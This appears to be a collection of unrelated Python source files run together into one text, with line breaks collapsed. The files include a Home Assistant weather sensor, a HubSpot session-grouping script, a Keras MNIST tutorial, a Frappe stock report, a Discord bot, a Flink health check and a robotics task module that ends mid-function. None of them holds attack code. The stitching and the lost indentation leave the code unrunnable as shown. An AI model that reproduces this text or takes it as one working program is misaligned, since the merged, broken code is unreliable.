_LOGGER.debug("Getting data for sensor: %s", self._name) data = await self.station_data.get_data() if data is None: # update likely got throttled and returned None, so use the cached # data from the station_data object self._state = self.station_data.data[self._condition] else: if self._condition in data: self._state = data[self._condition] else: _LOGGER.warning("%s sensor data not available from the " "station", self._condition) _LOGGER.debug("Sensor: %s | Data: %s", self._name, self._state) class AmbientStationData: """Class to interface with ambient-api library.""" def __init__(self, hass, api_key, app_key): """Initialize station data object.""" self.hass = hass self._api_keys = { 'AMBIENT_ENDPOINT': 'https://api.ambientweather.net/v1', 'AMBIENT_API_KEY': api_key, 'AMBIENT_APPLICATION_KEY': app_key, 'log_level': 'DEBUG' } self.data = None self._station = None self._api = None self._devices = None self.connect_success = False self.get_data = Throttle(SCAN_INTERVAL)(self.async_update) self._connect_api() # attempt to connect to API async def async_update(self): """Get new data.""" # refresh API connection since servers turn over nightly _LOGGER.debug("Getting new data from server") new_data = None await self.hass.async_add_executor_job(self._connect_api) await asyncio.sleep(2) # need minimum 2 seconds between API calls if self._station is not None: data = await self.hass.async_add_executor_job( self._station.get_data) if data is not None: new_data = data[0] self.data = new_data else: _LOGGER.debug("data is None type") else: _LOGGER.debug("Station is None type") return new_data def _connect_api(self): """Connect to the API and capture new data.""" from ambient_api.ambientapi import AmbientAPI self._api = AmbientAPI(**self._api_keys) self._devices = self._api.get_devices() if self._devices: self._station = self._devices[0] if self._station is not None: self.connect_success = True else: _LOGGER.debug("No station devices available") import urllib3 import json # OBJECTIVE: create json object for set of sessions by each unique visitor. one session is a group of events with # less than 10 minutes between events following the first one. a visitor (marked by visitor id) # can have multiple sessions # DATA CONSTRAINT: visitors data can be in any order, timestamps are in milliseconds, # generated sessions of visitor must be in chronological, URLs sorted in chronological, # duration = 0 when there is only one event in the session # 600 000 milliseconds = 10 minutes def main(): # allows for requests and keeps track of connection pools http = urllib3.PoolManager() # get the json data and load it into respDict as a dictionary resp = http.request('GET', 'https://candidate.hubteam.com/candidateTest/v3/problem/dataset?userKey=<KEY>') print(resp.status) respDict = json.loads(resp.data) sessionDict = {} # iterate through all the events for singleEvent in respDict["events"]: # if the visitor is new, start an array and add an array containing url and timestamp of event to it # add the visitor array to sessionDict if singleEvent["visitorId"] not in sessionDict.keys(): visitorArr = [] visitorArr.append([singleEvent["url"], singleEvent["timestamp"]]) sessionDict[singleEvent["visitorId"]] = visitorArr # else if the visitor has a previous event, update their sessionDict value by adding the new event elif singleEvent["visitorId"] in sessionDict.keys(): dictValArr = sessionDict[singleEvent["visitorId"]] dictValArr.append([singleEvent["url"], singleEvent["timestamp"]]) sessionDict[singleEvent["visitorId"]] = dictValArr # iterate through all the users for user in sessionDict.keys(): # sort the user events array by timestamp sessionDict[user].sort(key = lambda x:x[1]) # if a user only has one event, value is updated as follows: if len(sessionDict[user]) == 1: duration = 0 pages = [sessionDict[user][0][0]] startTime = sessionDict[user][0][1] sessionDict[user] = [{ "duration": duration, "pages": pages, "startTime": startTime }] # else if user has multiple events...must separate into sessions... elif len(sessionDict[user]) > 1: # array for all the sessions of a user sessionsArr = [] # array of a single session singleSession = [] # add the first event of a user into the single session array singleSession.append(sessionDict[user][0]) # simple for loop index iteration for eventIndex in range(len(sessionDict[user]) - 1): # if the following event is less than or equal to 10 minutes than the last one in the single session, add it to the single session if (sessionDict[user][eventIndex + 1][1] - sessionDict[user][eventIndex][1]) <= 600000: singleSession.append(sessionDict[user][eventIndex + 1]) # if the following event is greater than 10 minutes, add this single session to sessions array, clear single session, add following event elif (sessionDict[user][eventIndex + 1][1] - sessionDict[user][eventIndex][1]) > 600000: sessionsArr.append(singleSession) singleSession = [] singleSession.append(sessionDict[user][eventIndex + 1]) # add the last single session to sessions array sessionsArr.append(singleSession) # array to hold formatted sessions data formattedSessionsArr = [] # iterate through all the sessions for session in sessionsArr: # duration is last event timestamp - first event duration = session[len(session) - 1][1] - session[0][1] # make pages array with all the pages visited in a single session pages = [] for singleEvent in session: pages.append(singleEvent[0]) # startTime is timestamp of the first event startTime = session[0][1] # format each session and update the users value in sessionDict singleSessFormat = { "duration": duration, "pages": pages, "startTime": startTime } formattedSessionsArr.append(singleSessFormat) sessionDict[user] = formattedSessionsArr # label the final data, convert to json, POST, check status final = {"sessionsByUser":sessionDict} toJSON = json.dumps(final) resp = http.request('POST', 'https://candidate.hubteam.com/candidateTest/v3/problem/result?userKey=<KEY>', headers={'Content-Type': 'application/json'}, body=toJSON) print(resp.status) if __name__ == '__main__': main()# Make core client functions available without prefix. # # This file is Copyright (c) 2010 by the GPSD project # BSD terms apply: see the file COPYING in the distribution root for details. # # This code runs compatibly under Python 2 and 3.x for x >= 2. # Preserve this property! from __future__ import absolute_import # Ensure Python2 behaves like Python 3 from .gps import * from .misc import * # Keep in sync with GPSD_PROTO_MAJOR_VERSION and GPSD_PROTO_MINOR_VERSION in # gpsd.h api_major_version = 3 # bumped on incompatible changes api_minor_version = 14 # bumped on compatible changes # keep in sync with gpsd_version in SConstruct __version__ = '3.19-dev' # The 'client' module exposes some C utility functions for Python clients. # The 'packet' module exposes the packet getter via a Python interface. # -*- coding: utf-8 -*- """HR-specific validation helpers.""" from __future__ import unicode_literals import re from localflavor.stub import EMPTY_VALUES from localflavor.exceptions import ValidationError from localflavor.base import CharValidator, Select from localflavor.stub import _ from .hr_counties import COUNTY_CHOICES postal_code_re = re.compile(r'^\d{5}$') class HRCountySelect(Select): """A Select widget that uses a list of counties of Croatia as its choices.""" def __init__(self, attrs=None): super(HRCountySelect, self).__init__(attrs, choices=COUNTY_CHOICES) class HRPostalCodeField(CharValidator): """ Postal code of Croatia field. It consists of exactly five digits ranging from 10000 to possibly less than 60000. http://www.posta.hr/main.aspx?id=66 """ default_error_messages = { 'invalid': _('Enter a valid 5 digit postal code.'), } def clean(self, value): super(HRPostalCodeField, self).clean(value) if value in EMPTY_VALUES: return self.empty_value value = value.strip() if not postal_code_re.search(value): raise ValidationError(self.error_messages['invalid']) # Make sure the number is in valid range. if not 9999 < int(value) < 60000: raise ValidationError(self.error_messages['invalid']) return '%s' % value <filename>keras0/keras_tutorial_deeplearning.py import numpy as np np.random.seed(123) from keras.models import Sequential from keras.layers import Dense, Dropout, Activation, Flatten from keras.layers import Convolution2D, MaxPooling2D from keras.utils import np_utils from keras.datasets import mnist # globals: debugim=False # pre-shuffled data from the keras data loader... (X_train, y_train), (X_test, y_test) = mnist.load_data() print (X_train.shape) from matplotlib import pyplot as plt # show a first image in dataset if debugim: plt.imshow(X_train[0]) plt.show() a = X_test.shape[1] X_train = X_train.reshape(X_train.shape[0], a, a, 1) X_test = X_test.reshape(X_test.shape[0],a, a, 1) print(X_test.shape) # need brightness vales to be float32:s in [0,1] X_train = X_train.astype('float32') X_test = X_test.astype('float32') X_train /= 255 X_test /= 255 # print(y_train[:10]) # change number output to a bool-vector hit output (better?) y_train = np_utils.to_categorical(y_train, 10) y_test = np_utils.to_categorical(y_test, 10) ## --> [0, 0, 1, 0, 0, 0 ..., 0] == 2 model = Sequential() # note: step size == 1,1 can be changed using 'subsample' property model.add(Convolution2D(32, 3, 3, activation='relu', input_shape=(a, a, 1))) # DEBUG # print(model.output_shape) model.add(Convolution2D(32,3,3,activation='relu')) model.add(MaxPooling2D(pool_size=(2,2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(10, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(X_train, y_train, batch_size=32, epochs=10, verbose=1) <filename>Data Analysis/Combine Data/combine_weather_air_pollution_covid.py import datetime import pandas as pd import sys import os from pathlib import Path sys.path.append(os.path.join(os.path.join(os.path.join(os.path.join(os.path.dirname(__file__), '..'), '..'), 'Data Collection'), 'Apparatus')) # sys.path.append(Path(os.path.dirname(__file__) + '../../Data Collection/Apparatus')) from zip_conversion import state_to_abbreviation df = pd.read_csv(Path('Data Analysis/Combine Data/combined_weather_air_pollution_data_by_county.csv')) covid = pd.read_csv(Path('Data Analysis/Combine Data/combined_air_pollution_covid_data.csv'))[['state', 'county', 'Date', 'Confirmed']] covid = covid.rename(columns={'Date':'date_local'}) df['date_local'] = [datetime.datetime.strptime('/'.join([i.zfill(2) for i in date.split('/')[:2]] + date.split('/')[-1:]), '%m/%d/%Y').date() for date in df['date_local']] covid['date_local'] = [datetime.datetime.strptime(date, '%Y-%m-%d').date() for date in covid['date_local']] df['county'] = [i.replace(' County', '').replace(' City', '') for i in df['county']] abbreviation_df = pd.read_csv(Path('Data Collection/Apparatus/Docs/states_and_counties.csv')) covid['state'] = [state_to_abbreviation(i, abbreviation_df) for i in covid['state']] df.merge(covid, how='outer', on=['state', 'county', 'date_local']).to_csv('final_data.csv', index=False)#!/usr/bin/python """ Use normalized count matrix provided by DESeq2 to get transformed values """ __author__ = "<NAME>" import sys,os,getopt,csv,time,re,gc import numpy as np ## declare variables #homeDir = os.path.join(os.path.expanduser("~"),"sequencing","pieris") def load_file(sample): ## error check resultsFile = os.path.join(homeDir,'features',sample,'quant.sf') if not os.path.exists(resultsFile): raise Exception("Cannot find results file %s"%resultsFile) ## infile fidin = open(resultsFile,'r') reader = csv.reader(fidin,delimiter="\t") debug = 0 header = ['Transcript','Length','TPM','RPKM','KPKM','EstimatedNumKmers','EstimatedNumReads'] results = {} for key in header: results[key] = [] gc.disable() for linja in reader: if linja[0][0] == '#': continue results['Transcript'].append(linja[0]) results['TPM'].append(linja[2]) results['RPKM'].append(linja[3]) results['EstimatedNumReads'].append(linja[6]) gc.enable() return results if __name__ == "__main__": sampleList = ["17", "18", "33", "46", "56", "61", "DL47", "DL61", "D163", "D178", "D185", "D239"] allResults = {} for sample in sampleList: allResults[sample] = load_file(sample) def write_matrix(column): numTranscripts = len(allResults['17']['Transcript']) ## create a count matrix if column == 'EstimatedNumReads': outFile = os.path.join(homeDir,'features','est_counts.csv') else: outFile = os.path.join(homeDir,'features','%s_counts.csv'%(column.lower())) fidout = open(outFile,'w') writer = csv.writer(fidout) writer.writerow(['transcript'] + sampleList) for row in range(numTranscripts): trans = allResults['17']['Transcript'][row] toWrite = [allResults[s][column][row] for s in sampleList] writer.writerow([trans] + toWrite) write_matrix('EstimatedNumReads') write_matrix('TPM') write_matrix('RPKM') print('complete.') # Copyright (c) 2013, 9t9IT and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _ def execute(filters=None): columns, data = get_columns(filters), get_data(filters) return columns, data def get_columns(filters): return [ { "label": _("Date"), "fieldname": "date", "fieldtype": "Date", "width": 120 }, { "label": _("Doc No"), "fieldname": "doc_no", "fieldtype": "Link", "options": "Stock Entry", "width": 120 }, { "label": _("Job Code"), "fieldname": "job_code", "fieldtype": "Data", "width": 120 }, { "label": _("Job Name"), "fieldname": "job_name", "fieldtype": "Link", "options": "Project", "width": 120 }, { "label": _("Qty"), "fieldname": "qty", "fieldtype": "Int", "width": 80 } ] def get_data(filters): import pprint data = [] material_issues = _get_material_issues(filters) data = material_issues return data def _get_sql_conditions(filters): conditions = [] if filters.get('job_code'): conditions.append('`tabProject`.ashbee_project_code = %(job_code)s') if filters.get('item_code'): conditions.append('`tabStock Entry Detail`.item_code = %(item_code)s') if filters.get('stock_entry'): conditions.append('`tabStock Entry`.name = %(stock_entry)s') return ' AND '.join(conditions) def _get_material_issues(filters): sql_conditions = _get_sql_conditions(filters) if sql_conditions: sql_conditions = 'AND {}'.format(sql_conditions) return frappe.db.sql(""" SELECT `tabStock Entry`.posting_date AS 'date', `tabStock Entry`.name AS doc_no, `tabProject`.ashbee_project_code AS job_code, `tabStock Entry`.project AS job_name, SUM(`tabStock Entry Detail`.qty) AS qty FROM `tabStock Entry Detail` INNER JOIN `tabStock Entry` ON `tabStock Entry Detail`.parent = `tabStock Entry`.name INNER JOIN `tabProject` on `tabStock Entry`.project = `tabProject`.name WHERE `tabStock Entry`.docstatus = 1 {sql_conditions} AND `tabStock Entry`.purpose = 'Material Issue' AND `tabStock Entry`.posting_date BETWEEN %(from_date)s AND %(to_date)s GROUP BY `tabStock Entry`.name ORDER BY `tabStock Entry`.posting_date DESC """.format(sql_conditions=sql_conditions), filters, as_dict=1) <gh_stars>0 from flask_wtf import FlaskForm from wtforms import StringField, SubmitField, SelectField, PasswordField from wtforms.validators import DataRequired, URL class NewBookmarkForm(FlaskForm): url = StringField("url", validators=[DataRequired(), URL()]) path = SelectField("Topic") desc = StringField("desc") tags = StringField("tags") submit = SubmitField("Save") class NewNoteForm(FlaskForm): title = StringField("title", validators=[DataRequired()]) path = SelectField("Topic") desc = StringField("desc") tags = StringField("tags") submit = SubmitField("Save") class DeleteDataForm(FlaskForm): submit = SubmitField("Delete") class UserForm(FlaskForm): username = StringField("username") password = PasswordField("password") submit = SubmitField("Submit") <filename>opzoo/Convolution/Convolution.py import mobula from mobula.const import req @mobula.op.register class Conv2D: def __init__(self, channels, kernel_size, strides=(1, 1), padding=(0, 0), dilation=(1, 1), groups=1): self.channels = channels self.kernel_size = kernel_size self.strides = strides self.padding = padding self.dilation = dilation assert groups == 1 self.groups = groups def forward(self, x, weight, bias=None): # y = wx + b N, C, H, W = x.shape KH, KW = self.kernel_size PH, PW = self.padding SH, SW = self.strides DH, DW = self.dilation _, D, OH, OW = self.y.shape csize = C * KH * KW data_col = self.F.empty((csize, OH, OW)) rweight = weight.reshape((D, csize)) rbias = bias.reshape((-1, 1, 1)) if bias is not None else None for i in range(N): mobula.func.im2col( data_col.size, x[i], H, W, KH, KW, PH, PW, SH, SW, DH, DW, OH, OW, data_col) out = self.F.dot(rweight, data_col).reshape((D, OH, OW)) if rbias is not None: out += rbias self.assign(self.y[i], self.req[0], out) def backward(self, dy): N, C, H, W = self.dx.shape KH, KW = self.kernel_size PH, PW = self.padding SH, SW = self.strides DH, DW = self.dilation _, D, OH, OW = dy.shape csize = C * KH * KW ohw = OH * OW weightT = self.X[1].reshape((D, csize)).T out = self.F.empty_like(self.dx[0]) dw = 0 for i in range(N): rdy = dy[i].reshape((D, ohw)) data_col = self.F.dot(weightT, rdy) mobula.func.col2im( self.dx[0].size, data_col, H, W, KH, KW, PH, PW, SH, SW, DH, DW, OH, OW, out) self.assign(self.dX[0][i], self.req[0], out) mobula.func.im2col( data_col.size, self.x[i], H, W, KH, KW, PH, PW, SH, SW, DH, DW, OH, OW, data_col) dw += self.F.dot(rdy, data_col.T) self.assign(self.dX[1], self.req[1], dw.reshape_like(self.dX[1])) if len(self.X) == 3: self.assign(self.dX[2], self.req[2], dy.sum(1, exclude=True)) def infer_shape(self, in_shape): assert 2 <= len( in_shape) <= 3, "The inputs should be feature map(NCHW layout), weight and bias(optional)" assert len(in_shape[0]) == 4, "input: NCHW" assert len(in_shape[1]) == 4, "weight: DCKK" assert len(in_shape) == 2 or len(in_shape[2]) == 1, "bias: D" x, weight = in_shape[:2] N, C, H, W = x KH, KW = self.kernel_size PH, PW = self.padding SH, SW = self.strides DH, DW = self.dilation def get_outsize(X, K, P, S, D): K += (K - 1) * (D - 1) return (X + 2 * P - K) // S + 1 OH = get_outsize(H, KH, PH, SH, DH) OW = get_outsize(W, KW, PW, SW, DW) D = self.channels assert weight[0] == D assert weight[1] == C assert weight[2] == KH assert weight[3] == KW return in_shape, [(N, D, OH, OW)] # Copyright 2017 Mycroft AI Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import importlib import sys from os import listdir from os.path import abspath, dirname, basename, isdir, join from mycroft.util import LOG from ovos_plugin_manager.audio import setup_audio_service as setup_service, load_audio_service_plugins as load_plugins MAINMODULE = '__init__' def create_service_spec(service_folder): """Prepares a descriptor that can be used together with imp. Args: service_folder: folder that shall be imported. Returns: Dict with import information """ module_name = 'audioservice_' + basename(service_folder) path = join(service_folder, MAINMODULE + '.py') spec = importlib.util.spec_from_file_location(module_name, path) mod = importlib.util.module_from_spec(spec) info = {'spec': spec, 'mod': mod, 'module_name': module_name} return {"name": basename(service_folder), "info": info} def get_services(services_folder): """ Load and initialize services from all subfolders. Args: services_folder: base folder to look for services in. Returns: Sorted list of audio services. """ LOG.info("Loading services from " + services_folder) services = [] possible_services = listdir(services_folder) for i in possible_services: location = join(services_folder, i) if (isdir(location) and not MAINMODULE + ".py" in listdir(location)): for j in listdir(location): name = join(location, j) if (not isdir(name) or not MAINMODULE + ".py" in listdir(name)): continue try: services.append(create_service_spec(name)) except Exception: LOG.error('Failed to create service from ' + name, exc_info=True) if (not isdir(location) or not MAINMODULE + ".py" in listdir(location)): continue try: services.append(create_service_spec(location)) except Exception: LOG.error('Failed to create service from ' + location, exc_info=True) return sorted(services, key=lambda p: p.get('name')) def load_internal_services(config, bus, path=None): """Load audio services included in Mycroft-core. Args: config: configuration dict for the audio backends. bus: Mycroft messagebus path: (default None) optional path for builtin audio service implementations Returns: List of started services """ if path is None: path = dirname(abspath(__file__)) + '/services/' service_directories = get_services(path) service = [] for descriptor in service_directories: try: service_module = descriptor['info']['mod'] spec = descriptor['info']['spec'] module_name = descriptor['info']['module_name'] sys.modules[module_name] = service_module spec.loader.exec_module(service_module) except Exception as e: LOG.error('Failed to import module ' + descriptor['name'] + '\n' + repr(e)) else: s = setup_service(service_module, config, bus) if s: LOG.info('Loaded ' + descriptor['name']) service += s return service def load_services(config, bus, path=None): """Load builtin services as well as service plugins The builtin service folder is scanned (or a folder indicated by the path parameter) for services and plugins registered with the "mycroft.plugin.audioservice" entrypoint group. Args: config: configuration dict for the audio backends. bus: Mycroft messagebus path: (default None) optional path for builtin audio service implementations Returns: List of started services. """ return (load_internal_services(config, bus, path) + load_plugins(config, bus)) __version__ = '0.0.6' default_app_config = 'contractor.apps.ContractorConfig' <reponame>ThatOneWanderingWeirdo/Sleepbot import discord from discord.ext import commands def get_prefix(bot, message): """A callable Prefix for our bot. This could be edited to allow per server prefixes.""" # Notice how you can use spaces in prefixes. Try to keep them simple though. prefixes = ['!'] # Check to see if we are outside of a guild. e.g DM's etc. if not message.guild: # Only allow ? to be used in DMs return '?' # If we are in a guild, we allow for the user to mention us or use any of the prefixes in our list. return commands.when_mentioned_or(*prefixes)(bot, message) initial_extensions = ['cogs.members', 'cogs.announcements'] bot = commands.Bot(command_prefix=get_prefix, description='A Rewrite Cog Example') # Here we load our extensions(cogs) listed above in [initial_extensions]. if __name__ == '__main__': for extension in initial_extensions: bot.load_extension(extension) @bot.event async def on_ready(): """http://discordpy.readthedocs.io/en/rewrite/api.html#discord.on_ready""" print(f'\n\nLogged in as: {bot.user.name} - {bot.user.id}\nVersion: {discord.__version__}\n') print(f'Successfully logged in and booted...!') bot.run('TOKENHERE', bot=True, reconnect=True) <gh_stars>0 """ Copyright (c) 2016 Cisco and/or its affiliates. This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License"). You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc. and/or its affiliated entities, under various laws including copyright, international treaties, patent, and/or contract. Any use of the material herein must be in accordance with the terms of the License. All rights not expressly granted by the License are reserved. Unless required by applicable law or agreed to separately in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. Purpose: Blackbox test for the Deployment manager """ import time import argparse import json import requests from requests.exceptions import RequestException import eventlet from pnda_plugin import PndaPlugin from pnda_plugin import Event TIMESTAMP_MILLIS = lambda: int(round(time.time() * 1000)) TESTBOTPLUGIN = lambda: Flink() class Flink(PndaPlugin): ''' Flink test plugin for the Flink History Server ''' def __init__(self): pass def read_args(self, args): ''' This class argument parser. This shall come from main runner in the extra arg ''' parser = argparse.ArgumentParser(prog=self.__class__.__name__, usage='%(prog)s [options]', description='Show state of Flink History server') parser.add_argument('--fhendpoint', default='http://localhost:8082', help='Flink History Server endpoint e.g. http://localhost:8082') return parser.parse_args(args) @staticmethod def validate_api_response(response, path, other_exp_codes=None): expected_codes = [200] if other_exp_codes: expected_codes.extend(other_exp_codes) if response.status_code in expected_codes: return 'SUCCESS', None cause_msg = 'Flink History Server - {} (request path = {})'.format(response.text.strip(), path) return 'FAIL', cause_msg def runner(self, args, display=True): """ Main section. """ plugin_args = args.split() \ if args is not None and args.strip() \ else "" options = self.read_args(plugin_args) cause = [] values = [] hs_available_success, hs_completed_jobs_success = False, False hs_available_ms, hs_completed_jobs_ms = -1, -1 installed_flink_version, completed_job_count = '', -1 # noinspection PyBroadException try: path = '/config' start = TIMESTAMP_MILLIS() with eventlet.Timeout(100): req = requests.get("%s%s" % (options.fhendpoint, path), timeout=20) end = TIMESTAMP_MILLIS() hs_available_ms = end - start status, msg = Flink.validate_api_response(req, path) if status == 'SUCCESS': installed_flink_version = json.loads(req.text).get("flink-version", '') hs_available_success = True else: cause.append(msg) except RequestException: cause.append('Unable to connect to the Flink History Server (request path = {})'.format(path)) except Exception as except_obj: cause.append('Platform Testing Client Error- ' + str(except_obj)) # noinspection PyBroadException try: path = '/joboverview' start = TIMESTAMP_MILLIS() with eventlet.Timeout(100): req = requests.get("%s%s" % (options.fhendpoint, path), timeout=20) end = TIMESTAMP_MILLIS() hs_completed_jobs_ms = end - start # 404 - added to the expected response codes because, # Flink history server return 404, unless at least one flink job is executed. status, msg = Flink.validate_api_response(req, path, [404]) if status == 'SUCCESS': if req.status_code == 200: completed_job_count = len(json.loads(req.text).get('finished')) elif req.status_code == 404: completed_job_count = 0 hs_completed_jobs_success = True else: cause.append(msg) except RequestException: cause.append('Unable to connect to the Flink History Server (request path = {})'.format(path)) except Exception as except_obj: cause.append('Platform Testing Client Error- ' + str(except_obj)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_available_success", [], hs_available_success)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.installed_flink_version", [], installed_flink_version)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_available_ms", [], hs_available_ms)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_completed_jobs_success", [], hs_completed_jobs_success)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_completed_jobs_count", [], completed_job_count)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_completed_jobs_ms", [], hs_completed_jobs_ms)) health = "OK" if not hs_available_success or not hs_completed_jobs_success: health = "ERROR" values.append(Event(TIMESTAMP_MILLIS(), 'flink', 'flink.health', cause, health)) if display: self._do_display(values) return values <reponame>incognite-lab/myGym from myGym.envs.vision_module import VisionModule import matplotlib.pyplot as plt import pybullet as p import time import numpy as np import pkg_resources import cv2 import random from scipy.spatial.distance import cityblock import math currentdir = pkg_resources.resource_filename("myGym", "envs") class TaskModule(): """ Task module class for task management Parameters: :param task_type: (string) Type of learned task (reach, push, ...) :param num_subgoals: (int) Number of subgoals in task :param task_objects: (list of strings) Objects that are relevant for performing the task :param reward_type: (string) Type of reward signal source (gt, 3dvs, 2dvu) :param distance_type: (string) Way of calculating distances (euclidean, manhattan) :param logdir: (string) Directory for logging :param env: (object) Environment, where the training takes place """ def __init__(self, task_type='reach', task_objects='cube_holes', num_subgoals=0, reward_type='gt', vae_path=None, yolact_path=None, yolact_config=None, distance_type='euclidean', logdir=currentdir, env=None): self.task_type = task_type self.reward_type = reward_type self.distance_type = distance_type self.logdir = logdir self.task_objects_names = task_objects self.num_subgoals = num_subgoals self.env = env self.image = None self.depth = None self.last_distance = None self.init_distance = None self.current_norm_distance = None self.stored_observation = [] self.fig = None self.threshold = 0.1 # distance threshold for successful task completion self.obsdim = (len(env.task_objects_names) + 1) * 3 self.angle = None self.prev_angle = None self.pressed = None self.turned = None self.desired_angle = 57 self.coefficient_kd = 0 self.coefficient_kw = 0 self.coefficient_ka = 0 if self.task_type == '2stepreach': self.obsdim = 6 if self.reward_type == 'gt': src = 'ground_truth' elif self.reward_type == '3dvs': src = 'yolact' elif self.reward_type == '2dvu': src = 'vae' elif self.reward_type == '6dvs': src = 'dope' self.obsdim += 6 else: raise Exception("You need to provide valid reward type.") self.vision_module = VisionModule(vision_src=src, env=env, vae_path=vae_path, yolact_path=yolact_path, yolact_config=yolact_config) if src == "vae": self.obsdim = self.vision_module.obsdim def reset_task(self): """ Reset task relevant data and statistics """ self.last_distance = None self.init_distance = None self.current_norm_distance = None self.angle = None self.pressed = None self.turned = None self.vision_module.mask = {} self.vision_module.centroid = {} self.vision_module.centroid_transformed = {} self.env.task_objects.append(self.env.robot) if self.reward_type == '2dvu': self.generate_new_goal(self.env.objects_area_boarders, self.env.active_cameras) self.subgoals = [False]*self.num_subgoals #subgoal completed? if self.task_type == '2stepreach': self.obs_sub = [[0,2],[0,1]] #objects to have in observation for given subgoal self.sub_idx = 0 def render_images(self): render_info = self.env.render(mode="rgb_array", camera_id=self.env.active_cameras) self.image = render_info[self.env.active_cameras]["image"] self.depth = render_info[self.env.active_cameras]["depth"] if self.env.visualize == 1 and self.reward_type != '2dvu': cv2.imshow("Vision input", cv2.cvtColor(self.image, cv2.COLOR_RGB2BGR)) cv2.waitKey(1) def visualize_2dvu(self, recons): imsize = self.vision_module.vae_imsize actual_img, goal_img = [(lambda a: cv2.resize(a[60:390, 160:480], (imsize, imsize)))(a) for a in [self.image, self.goal_image]] images = [] for idx, im in enumerate([actual_img, recons[0], goal_img, recons[1]]): im = cv2.copyMakeBorder(im, 30, 10, 10, 20, cv2.BORDER_CONSTANT, value=[255, 255, 255]) cv2.putText(im, ["actual", "actual rec", "goal", "goal rec"][idx], (10, 20), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 1, 0) images.append(cv2.cvtColor(im, cv2.COLOR_RGB2BGR)) fig = np.vstack((np.hstack((images[0], images[1])), np.hstack((images[2], images[3])))) cv2.imshow("Scene", fig) cv2.waitKey(1) def get_observation(self): """ Get task relevant observation data based on reward signal source Returns: :return self._observation: (array) Task relevant observation data, positions of task objects """ obj_positions, obj_orientations = [], [] self.render_images() if self.reward_type != "gt" else None if self.reward_type == '2dvu': obj_positions, recons = (self.vision_module.encode_with_vae(imgs=[self.image, self.goal_image], task=self.task_type, decode=self.env.visualize)) obj_positions.append(list(self.env.robot.get_position())) self.visualize_2dvu(recons) if self.env.visualize == 1 else None else: if self.task_type == '2stepreach': self.current_task_objects = [self.env.task_objects[x] for x in self.obs_sub[self.sub_idx]] #change objects in observation based on subgoal else: self.current_task_objects = self.env.task_objects #all objects in observation for env_object in self.current_task_objects: obj_positions.append(self.vision_module.get_obj_position(env_object,self.image,self.depth)) if self.reward_type == '6dvs' and self.task_type != 'reach' and env_object != self.env.task_objects[-1]: obj_orientations.append(self.vision_module.get_obj_orientation(env_object,self.image)) if self.env.has_distractor: obj_positions.append(self.env.robot.get_links_observation(self.env.observed_links_num)) obj_positions[len(obj_orientations):len(obj_orientations)] = obj_orientations self._observation = np.array(sum(obj_positions, [])) return self._observation def check_vision_failure(self): """ Check if YOLACT vision model fails repeatedly during episode Returns: :return: (bool) """ self.stored_observation.append(self._observation) if len(self.stored_observation) > 9: self.stored_observation.pop(0) if self.reward_type == '3dvs': # Yolact assigns 10 to not detected objects if all(10 in obs for obs in self.stored_observation): return True return False def check_time_exceeded(self): """ Check if maximum episode time was exceeded Returns: :return: (bool) """ if (time.time() - self.env.episode_start_time) > self.env.episode_max_time: self.env.episode_info = "Episode maximum time {} s exceeded".format(self.env.episode_max_time) return True return False def check_object_moved(self, object, threshold=0.3): """ Check if object moved more than allowed threshold Parameters: :param object: (object) Object to check :param threshold: (float) Maximum allowed object movement Returns: :return: (bool) """ if self.reward_type != "2dvu": object_position = object.get_position() pos_diff = np.array(object_position[:2]) - np.array(object.init_position[:2]) distance = np.linalg.norm(pos_diff) if distance > threshold: self.env.episode_info = "The object has moved {:.2f} m, limit is {:.2f}".format(distance, threshold) return True return False def check_switch_threshold(self): self.angle = self.env.reward.get_angle() if abs(self.angle) >= 18: return True else: return False def check_press_threshold(self): self.pressed = self.env.reward.get_position() if self.pressed >= 1.71: return True else: return False def check_turn_threshold(self): self.turned = self.env.reward.get_angle() if self.turned >= self.desired_angle: return True elif self.turned <= -self.desired_angle: return -1 else: return False # def check_distance_threshold(self, observation): # """ # Check if the distance between relevant task objects is under threshold for successful task completion # # Returns: # :return: (bool) # """ # observation = observation["observation"] if isinstance(observation, dict) else observation # o1 = observation[0:int(len(observation[:-3])/2)] if self.reward_type == "2dvu" else observation[0:3] # o2 = observation[int(len(observation[:-3])/2):-3]if self.reward_type == "2dvu" else observation[3:6] # self.current_norm_distance = self.calc_distance(o1, o2) # return self.current_norm_distance < self.threshold def check_poke_threshold(self, observation): """ Check if the distance between relevant task objects is under threshold for successful task completion Returns: :return: (bool) """ observation = observation["observation"] if isinstance(observation, dict) else observation goal = observation[0:3] poker = observation[3:6] self.current_norm_distance = self.calc_distance(goal, poker) return self.current_norm_distance < 0.1 def check_reach_distance_threshold(self, observation): """ Check if the distance between relevant task objects is under threshold for successful task completion Jonášova verze Returns: :return: (bool) """ observation = observation["observation"] if isinstance(observation, dict) else observation goal = observation[0:3] gripper = self.env.reward.get_accurate_gripper_position(observation[3:6]) self.current_norm_distance = self.calc_distance(goal, gripper) return self.current_norm_distance < self.threshold def check_distance_threshold(self, observation): """ Check if the distance between relevant task objects is under threshold for successful task completion Jonášova verze Returns: :return: (bool) """ observation = observation["observation"] if isinstance(observation, dict) else observation # goal is first in obs and griper is last (always) goal = observation[0:3] gripper = self.env.reward.get_accurate_gripper_position(observation[-3:]) 